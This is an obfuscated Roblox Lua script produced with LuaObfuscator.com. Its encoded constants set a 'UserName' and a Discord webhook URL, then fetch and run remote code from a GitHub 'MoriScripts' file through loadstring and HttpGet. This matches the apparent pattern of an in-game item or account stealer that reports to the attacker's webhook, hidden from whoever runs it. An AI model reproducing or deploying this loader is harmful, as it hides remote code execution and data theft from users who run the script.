--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v81,v19);v19=nil;v87=1;end end else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((1 + 1)^(v32-(1 -0))))%((879 -(63 + 219 + 595))^(((v33-((2595 -(892 + 65)) -(1523 + 114))) -(v32-((4 -2) -1))) + (620 -(555 + 64)))) ;return v83-(v83%(1066 -(68 + (1842 -845)))) ;end end else local v84=(933 -(857 + 74))^(v32-((7 -3) -3)) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or (0 + 0) ;end end local function v21()local v34=350 -(87 + 263) ;local v35;while true do if (v34==(181 -(67 + 113))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (7 -5) );v18=v18 + (954 -(802 + 150)) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v41 * (12211951 + 4565265)) + (v40 * 65536) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=998 -(915 + 82) ;local v45=(v20(v43,(440 -(145 + 293)) -1 ,(442 -(44 + 386)) + 8 ) * ((2 -(1486 -(998 + 488)))^(1219 -(1069 + 118)))) + v42 ;local v46=v20(v43,21,70 -39 );local v47=((v20(v43,69 -37 )==(1 + 0)) and  -(1 + 0)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==0) then return v47 * (0 + 0) ;else v46=792 -((1140 -(201 + 571)) + (1561 -(116 + 1022))) ;v44=0 -0 ;end elseif (v46==(2065 -(10 + 8))) then return ((v45==0) and (v47 * ((3 -2)/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/((1 + 1)^(91 -39)))) ;end local function v25(v48)local v49=0 -0 ;local v50;local v51;while true do if (v49==(2 + 1)) then return v6(v51);end if (v49==(7 -5)) then v51={};for v89=3 -(1425 -(630 + 793)) , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=862 -(814 + 45) ;end if (v49==(2 -1)) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==((0 -0) + 0)) then v50=nil;if  not v48 then local v95=0;while true do if (v95==(885 -(261 + 624))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=1081 -((4829 -3809) + 60) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1 -0)) then v55=nil;v56=nil;v52=343 -(218 + 123) ;end if (v52~=3) then else v59=nil;v60=nil;v52=1585 -(1535 + 46) ;end if (v52~=4) then else while true do if (v53==3) then v60=nil;while true do local v102=0 + 0 ;local v103;while true do if ((0 + 0)==v102) then v103=560 -(306 + 254) ;while true do if (v103==(0 + 0)) then if (v54~=1) then else local v145=0 -0 ;while true do if (v145~=(1469 -(899 + 568))) then else v54=2 + 0 ;break;end if (0==v145) then v59=v23();v60={};v145=1;end if (v145==1) then local v163=0 -0 ;while true do if ((604 -(268 + 335))~=v163) then else v145=292 -(60 + 230) ;break;end if (0~=v163) then else for v167=573 -(426 + 146) ,v59 do local v168=0;local v169;local v170;local v171;local v172;while true do if (v168~=1) then else v171=nil;v172=nil;v168=1 + 1 ;end if (v168==0) then v169=0;v170=nil;v168=1457 -(282 + 1174) ;end if (v168~=2) then else while true do if (v169==0) then local v180=811 -(569 + 242) ;while true do if (0~=v180) then else v170=0 -0 ;v171=nil;v180=1;end if ((1 + 0)==v180) then v169=1025 -(706 + 318) ;break;end end end if ((1252 -(721 + 530))~=v169) then else v172=nil;while true do if (v170==(1271 -(945 + 326))) then local v181=0 -0 ;local v182;while true do if (v181~=(0 + 0)) then else v182=0;while true do if (v182~=(700 -(271 + 429))) then else v171=v21();v172=nil;v182=1 + 0 ;end if (v182==(1501 -(1408 + 92))) then v170=1087 -(461 + 625) ;break;end end break;end end end if (v170==(1289 -(993 + 295))) then if (v171==1) then v172=v21()~=0 ;elseif (v171==2) then v172=v24();elseif (v171~=3) then else v172=v25();end v60[v167]=v172;break;end end break;end end break;end end end v58[3]=v21();v163=1 + 0 ;end end end end end if (v54==2) then local v146=0;local v147;while true do if (v146~=(1171 -(418 + 753))) then else v147=0;while true do if ((0 + 0)~=v147) then else local v165=0 + 0 ;while true do if (v165~=(0 + 0)) then else for v174=1 + 0 ,v23() do local v175=0;local v176;local v177;while true do if (0~=v175) then else v176=0;v177=nil;v175=1;end if (1~=v175) then else while true do if (v176==0) then v177=v21();if (v20(v177,1,1)==(529 -(406 + 123))) then local v184=0;local v185;local v186;local v187;local v188;local v189;while true do if (v184==1) then v187=nil;v188=nil;v184=1771 -(1749 + 20) ;end if (v184~=2) then else v189=nil;while true do if (v185==0) then local v190=0;while true do if (v190~=0) then else v186=0 + 0 ;v187=nil;v190=1;end if (v190==1) then v185=1323 -(1249 + 73) ;break;end end end if (v185~=1) then else v188=nil;v189=nil;v185=1 + 1 ;end if (v185~=(1147 -(466 + 679))) then else while true do if (0~=v186) then else local v191=0 -0 ;local v192;while true do if (0~=v191) then else v192=0;while true do if ((2 -1)~=v192) then else v186=1;break;end if (0~=v192) then else local v200=0;while true do if (v200==0) then v187=v20(v177,1902 -(106 + 1794) ,3);v188=v20(v177,2 + 2 ,2 + 4 );v200=2 -1 ;end if (v200==1) then v192=2 -1 ;break;end end end end break;end end end if (v186~=(117 -(4 + 110))) then else if (v20(v188,3,3)~=(585 -(57 + 527))) then else v189[1431 -(41 + 1386) ]=v60[v189[107 -(17 + 86) ]];end v55[v174]=v189;break;end if (v186==2) then local v194=0;local v195;while true do if (v194~=(0 + 0)) then else v195=0;while true do if (v195==0) then if (v20(v188,1 -0 ,2 -1 )==(167 -(122 + 44))) then v189[2]=v60[v189[2 -0 ]];end if (v20(v188,6 -4 ,2 + 0 )~=1) then else v189[3]=v60[v189[1 + 2 ]];end v195=1;end if (v195==1) then v186=3;break;end end break;end end end if (v186==(1 -0)) then local v196=65 -(30 + 35) ;local v197;while true do if (v196==(0 + 0)) then v197=1257 -(1043 + 214) ;while true do if (v197==(3 -2)) then v186=2;break;end if (v197~=(1212 -(323 + 889))) then else local v201=0;while true do if (0~=v201) then else v189={v22(),v22(),nil,nil};if (v187==(580 -(361 + 219))) then local v206=0;local v207;local v208;while true do if (v206==0) then v207=320 -(53 + 267) ;v208=nil;v206=1 + 0 ;end if (v206~=1) then else while true do if (v207~=0) then else v208=0;while true do if ((413 -(15 + 398))==v208) then v189[3]=v22();v189[986 -(18 + 964) ]=v22();break;end end break;end end break;end end elseif (v187==1) then v189[11 -8 ]=v23();elseif (v187==(2 + 0)) then v189[2 + 1 ]=v23() -((852 -(20 + 830))^16) ;elseif (v187~=(3 + 0)) then else local v211=126 -(116 + 10) ;local v212;local v213;while true do if (v211~=(1 + 0)) then else while true do if (v212~=(738 -(542 + 196))) then else v213=0;while true do if (v213~=(0 -0)) then else v189[3]=v23() -((1 + 1)^(9 + 7)) ;v189[2 + 2 ]=v22();break;end end break;end end break;end if (v211==0) then v212=0;v213=nil;v211=2 -1 ;end end end v201=1;end if ((2 -1)~=v201) then else v197=1552 -(1126 + 425) ;break;end end end end break;end end end end break;end end break;end if (v184==(405 -(118 + 287))) then v185=0;v186=nil;v184=1;end end end break;end end break;end end end for v178=3 -2 ,v23() do v56[v178-1 ]=v28();end v165=1;end if (v165==(1122 -(118 + 1003))) then v147=1;break;end end end if ((2 -1)==v147) then return v58;end end break;end end end v103=1;end if (v103==1) then if (v54==0) then local v148=0;local v149;while true do if (v148~=0) then else v149=0;while true do if (v149==0) then v55={};v56={};v149=1;end if (2==v149) then v54=378 -(142 + 235) ;break;end if (v149~=(4 -3)) then else local v166=0;while true do if (v166~=(1 + 0)) then else v149=2;break;end if (v166~=0) then else local v173=0;while true do if (v173==0) then v57={};v58={v55,v56,nil,v57};v173=1 + 0 ;end if (v173~=1) then else v166=1 + 0 ;break;end end end end end end break;end end end break;end end break;end end end break;end if (v53~=1) then else local v98=0;while true do if (v98==(1 + 0)) then v53=1 + 1 ;break;end if (v98==0) then v56=nil;v57=nil;v98=1 + 0 ;end end end if ((4 -2)~=v53) then else local v99=0;while true do if (v99~=1) then else v53=3;break;end if (v99==0) then v58=nil;v59=nil;v99=1;end end end if ((0 -0)~=v53) then else local v100=0 -0 ;local v101;while true do if (v100~=(0 + 0)) then else v101=0 -0 ;while true do if (v101==0) then v54=753 -(239 + 514) ;v55=nil;v101=1 + 0 ;end if (v101~=1) then else v53=1;break;end end break;end end end end break;end if (v52~=(1329 -(797 + 532))) then else v53=0;v54=nil;v52=1 + 0 ;end if (v52~=(1 + 1)) then else v57=nil;v58=nil;v52=3;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (v86==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then local v104=v79[2];v77[v104]=v77[v104](v13(v77,v104 + 1 ,v72));elseif (v80>1) then local v113=v79[2];local v114=v77[v79[3]];v77[v113 + 1 ]=v114;v77[v113]=v114[v79[4]];else local v118;local v119,v120;local v121;local v122;v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v122=v79[2];v121=v77[v79[3]];v77[v122 + 1 ]=v121;v77[v122]=v121[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v122=v79[2];v119,v120=v70(v77[v122](v13(v77,v122 + 1 ,v79[3])));v72=(v120 + v122) -1 ;v118=0;for v142=v122,v72 do v118=v118 + 1 ;v77[v142]=v119[v118];end v71=v71 + 1 ;v79=v67[v71];v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end elseif (v80<=3) then local v106=v79[2];local v107,v108=v70(v77[v106](v13(v77,v106 + 1 ,v79[3])));v72=(v108 + v106) -1 ;local v109=0;for v110=v106,v72 do v109=v109 + 1 ;v77[v110]=v107[v109];end elseif (v80==4) then v77[v79[2]]=v79[3];else local v134=0;while true do if (v134==2) then v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v134=3;end if (v134==0) then v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v134=1;end if (v134==1) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v134=2;end if (v134==4) then v71=v79[3];break;end if (v134==3) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v134=4;end end end elseif (v80<=8) then if (v80<=6) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>7) then do return;end else v63[v79[3]]=v77[v79[2]];end elseif (v80<=10) then if (v80>9) then v77[v79[2]]();else v71=v79[3];end elseif (v80>11) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;break;end if (v86==0) then v79=v67[v71];v80=v79[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203073O00476D752O6E2O65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313O3537382O39303531302O3237352O362F495239686B6C426D31574A764C2D6E72425235446F765F4337586F33386C6D64737833374863526536636470385835656D6E79627548325343396F6A6F5956704A57745600173O0012043O00013O0026063O000E000100020004093O000E0001001204000100043O001201000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026063O0001000100010004093O00010001001204000100043O001205000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00083O00017O00",v9(),...);
